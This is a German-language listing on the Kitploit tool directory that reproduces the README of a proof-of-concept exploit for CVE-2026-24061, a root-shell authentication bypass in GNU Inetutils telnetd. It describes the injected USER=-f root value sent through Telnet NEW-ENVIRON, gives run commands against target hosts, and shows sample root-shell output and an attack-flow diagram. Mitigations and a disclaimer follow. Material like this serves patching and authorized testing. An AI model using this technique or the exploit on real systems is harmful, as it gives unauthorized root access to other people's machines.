Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — Proof-of-Concept-Exploit für die Authentifizierungsumgehung von GNU Inetutils telnetd (CVE-2026-24061), der über eine manipulierte NEW-ENVIRON USER-Variable eine Root-Shell startet. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRemote-Access-Tool
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

Proof-of-Concept-Exploit für die Authentifizierungsumgehung von GNU Inetutils telnetd (CVE-2026-24061), der über eine manipulierte NEW-ENVIRON USER-Variable eine Root-Shell startet.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Übersicht

Dieses Repository enthält einen Proof‑of‑Concept‑Exploit für die Remote‑Authentifizierungsumgehungsschwachstelle in GNU Inetutils telnetd.

Das Problem entsteht, weil telnetd die über die Telnet‑NEW‑ENVIRON‑Aushandlung empfangene Umgebungsvariable USER vor dem Aufruf von /bin/login nicht ordnungsgemäß bereinigt.

Durch die Angabe von:

root@kitploit:~
USER=-f root

führt telnetd effektiv Folgendes aus:

root@kitploit:~
/bin/login -f root

was die Authentifizierung umgeht und eine sofortige Root‑Shell startet.

  • Produkt: GNU Inetutils telnetd
  • Betroffene Versionen: ≤ 2.7
  • Port: 23/TCP
  • Authentifizierung: Nicht erforderlich
  • Auswirkung: Authentifizierungsumgehung → Root‑Shell
  • Berechtigungen: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (Kritisch)

⚙️ Technische Details

Telnet NEW‑ENVIRON erlaubt Clients, während der Sitzungsaushandlung Umgebungsvariablen zu setzen.

Das verwundbare telnetd übergibt USER direkt an login:

root@kitploit:~
/bin/login -f "$USER"

Ein Angreifer setzt:

root@kitploit:~
USER=-f root

Ergebnis:

root@kitploit:~
/bin/login -f root

Das Flag -f weist login an, die Authentifizierung zu überspringen, wodurch Root‑Zugriff gewährt wird.


📦 Anforderungen

  • Python 3
  • telnetlib (Standardbibliothek)
  • Zielsystem mit verwundbarem inetutils‑telnetd ≤ 2.7
  • Telnet‑Dienst über TCP/23 erreichbar

Keine externen Abhängigkeiten erforderlich.


🚀 Verwendung

1️⃣ Exploit ausführen

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ Optionaler Port

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ Erwartetes Ergebnis

Wenn verwundbar:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

Sie haben nun eine interaktive Root‑Shell.


🧪 Beispiel

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

Ausgabe:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 Hinweise

  • Der Exploit ist sofort wirksam
  • Keine Brute‑Force erforderlich
  • Keine Anmeldedaten erforderlich
  • Wurde in freier Wildbahn ausgenutzt beobachtet
  • Funktioniert bei Standard‑Debian/Ubuntu‑inetutils‑telnetd‑Installationen
  • Schlägt fehl, wenn telnetd gepatcht oder ersetzt wurde (z. B. OpenBSD telnetd)

🛡️ Gegenmaßnahmen

  • GNU Inetutils ≥ 2.8 aktualisieren
  • Telnet‑Dienst deaktivieren
  • Durch SSH ersetzen
  • TCP/23 in der Firewall blockieren
  • inetutils‑telnetd‑Pakete prüfen

📊 PoC‑Angriffsablauf

root@kitploit:~
sequenceDiagram
    participant A as Angreifer
    participant T as Ziel‑telnetd
    participant L as /bin/login
    participant R as Root‑Shell

    A->>T: Verbindung TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Ausführen /bin/login -f root
    L-->>T: Auth‑Umgehung erfolgreich
    T-->>R: Root‑Shell starten
    R-->>A: Interaktive Root‑Sitzung

⚠️ Haftungsausschluss

Dieser Exploit wird bereitgestellt für:

  • Sicherheitsforschung
  • Autorisierte Penetrationstests
  • Defensive Validierung

Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.

Tool herunterladen